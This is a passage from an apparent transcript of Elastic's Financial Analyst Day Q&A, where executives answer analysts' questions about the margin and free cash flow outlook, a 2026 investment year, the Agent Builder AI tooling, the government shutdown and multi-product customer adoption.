It doesn't affect our cost profile in any negative way. With that, let me just.

Navam Welihinda
CFO, Elastic

Yeah, let me kind of start first on the OpEx side, just to build on what Ash said. I think we broke out the components of what we expect R&D, sales and marketing, to G&A to do in the midterm model on the operating expense side. We expect strong investments into the R&D side, keep that stable. The sales and marketing line, I think we've shown the amount of leverage we can drive. In 2026, we are investing in capacity. I think we're doing a really good job on the productivity improvements. We're seeing all the good things that are happening in the field. We want to double down on that and build some capacity there. 2026 is a build year.

After the build year in 2026, you're going to see the progressive improvements in sales and marketing as a percentage of revenue, similar to the G&A side as a percentage of revenue. We should think of this as a build year. After that, we're going to go back in the margin trajectory. Remember what I talked about, capital allocation. We still want to invest to win the market and make sure that we're positioning ourselves for winning. At the same time, we're going to be very disciplined. On the free cash flow side, the model is to get to 40%+ under the target scenario of 15 +, upwards of 15, and upwards of 5. In any scenario, we were going to get to Rule of 40 +. Obviously, the growth components of the 20% + are those two tailwind plus baseline growth rates.

This year, our FCF margin is expected to be roughly the same as last year.

Tyler Radke
Managing Director and Senior Equity Research Analyst, Citi

Yeah, Tyler Radke from Citi. Thanks for doing this. I thought sort of the framing of Elastic as kind of the leading unstructured data platform definitely resonated across all the different presentations. I guess my question is, as we think about the ways in which AI are changing the way that you can kind of productize that, I'd love to get your thoughts. I mean, this Agent Builder that you demoed seemed pretty compelling. You are seeing a lot of newer vendors almost offer out-of-the-box solutions, whether it's on the search side, the gleams of the world. You're seeing vibe coding products probably leverage a lot of the core Elastic functionality. How do you sort of think about all the trends in the developer space around automation, AI, driving more usage of Elastic over time? What are you doing from a product perspective? Second question for Navam.

You raised guide like six weeks after you reported. What have you seen over the last six weeks? Was this just strength on consumption? Was it bookings on the federal side? Any elaboration on that? What's driving that confidence?

Ash Kulkarni
CEO, Elastic

Maybe let me just touch upon the first one in terms of monetization. At the end of the day, our fundamental model for monetization is consumption, as you know, Tyler. Everything that we do is designed to both give value to our customers with what they are trying to achieve, and at the same time, drive consumption on the platform. That is effectively how we are going to grow. All the announcements that you heard of today, whether it's the Elastic Inference Service, the new models from Jina that will become part of that inference service, will also be offered. All of those are compute intensive. Our use as a vector database when somebody is building the retrieval system for context engineering to build any kind of agent, that is a significant contributor to consumption.

Agent Builder, the way you should think about Agent Builder is it's going to fast-track the process by which somebody actually builds these kinds of end applications. That's the key. We don't have a business UI, but that's because at the end of the day, the people who work best and fastest with Elastic are developers. Unlike some of these other companies that you mentioned, we have a huge mind share with the developer community. Tapping into that developer community, which ends up being a massive community and is building applications that are used by enterprises, by every user within the enterprise, we feel is a much more efficient way and a much faster way to really get penetration. Agent Builder, what it lets us do is it fast-tracks the approach for an end user to actually build these kinds of applications. That is key.

I don't know if you want to add anything to that.

Ken Exner
Chief Product Officer, Elastic

Just to expand on one thing you said, our approach has always been to allow people to drop down to the platform and drop down to code and have the flexibility to do whatever they want. With a lot of the other solutions out there, if it can't do what you want, you're stuck. Like you want to go customize this, you can't. If it doesn't support it in the product, you can't do it. We never keep our developers from being stuck. They can always drop down. They can always customize. We try to make it very easy to get started by providing an abstraction. You saw an Agent Builder, like we create an agent automatically by default. We create some tools automatically by default. You can go in, you can customize, you can extend. That's been in our ethos, like something we do.

We also approach this from a data point of view. Unlike anyone else, we start with the data. We're trying to give you access to building tools and building agents on top of your data. We look at this as you want to chat with your data. You want to build an agent on top of your data. You have private data. How do you expose that to an agent? How do you expose that to an LLM? That's the point of view we always take. Others tend to start with the hosting platform or something else. We start with the data and try to figure out how to help a customer expose that data and build generative AI applications on top of that data.

Navam Welihinda
CFO, Elastic

Yeah, on the guidance side, commitments are strong. That's what gave us confidence to raise the year. That's the first thing. We're further along in the quarter, so we wanted to give you an update on the quarter as well. When you think about the government shutdown side, I think there'll be obviously no business conducted in October since there's no one there for the federal government. Overall, the government's going to open up at some point, and our products are positioned very well once that happens. In fact, we had several good contracts before the government shut down as well. We're not worried about the U.S. public sector business over the medium term. It's just that October is obviously going to be impacted by the government shutdown. Overall, commitments are going very strong. That's the reason to do the update.

Eric Prengel
Global VP of Finance, Elastic

We're going to do one last question. It's going to be Raimo.

Raimo Lenschow
Managing Director, Barclays

Thanks for squeezing me in. No pressure on the question quality, I guess. Thank you. And thanks from me as well. A great event. Maybe one for Mark as well to get him back on. If you look at the, as a sales leader, if you look at the number of customers that only have one product compared to where it should be, that's kind of a huge upside. The question is, why is that number so low? I'm sure you guys looked at it. Is it kind of the wrong customer? Or is there a lot more you can do there? That feels like way too low as a kind of ratio. Thank you.

Mark Dodds
Chief Revenue Officer, Elastic

Yeah, it's a great question. We believe there's a lot of upside there. We looked at how we were covering our customers in the past. First of all, we weren't aligning our sales capacity to the largest opportunities. We had territories that had way too many accounts, a combination of existing accounts and white space accounts. The sellers didn't have the time to focus, get deeper with customers, and focus on going to the next solution within the customer. That is why we made a lot of the changes that we made. We're seeing progress on that already. We see that as tremendous upside going forward.

Ash Kulkarni
CEO, Elastic

You know, that was the last question. All I would say is hopefully some of you, or if not most of you, had the opportunity to come earlier during the day and see the complete presentations. This event, our Elastic{ON} event, is always something that we care a lot about because this is one of the greatest and best opportunities for our customers to learn from us, but also from each other. You had the opportunity to participate in the Financial Analyst Day. Hopefully, you were able to get some energy and some ability to talk to customers who are here, get more insights into how they are adopting our platform, hear about some of their success stories with us, hear about why they are excited about what we are doing. We are really, really excited about what the future holds for us.

Just in terms of the business overall, the commitments that we are seeing from customers, the demand that we are seeing in the market, the opportunity to take more share as we consolidate onto our platform, the needs that customers have around Observability, Security, and so on. Most importantly, how we can differentiate with AI, how we can capture this wave. I am very confident that AI is going to be the dominant technology for at least the next several decades. If that's the case, then you have to imagine that more and more applications are going to be built on this LLM-based paradigm. We want to be the context engineering platform that every single one of those applications uses. That's our mission. That's our vision. That's why we are so excited about the future. Thank you again. I believe there's a cocktail hour for the entire event.

You are all very welcome to join. Thank you very much.

Powered by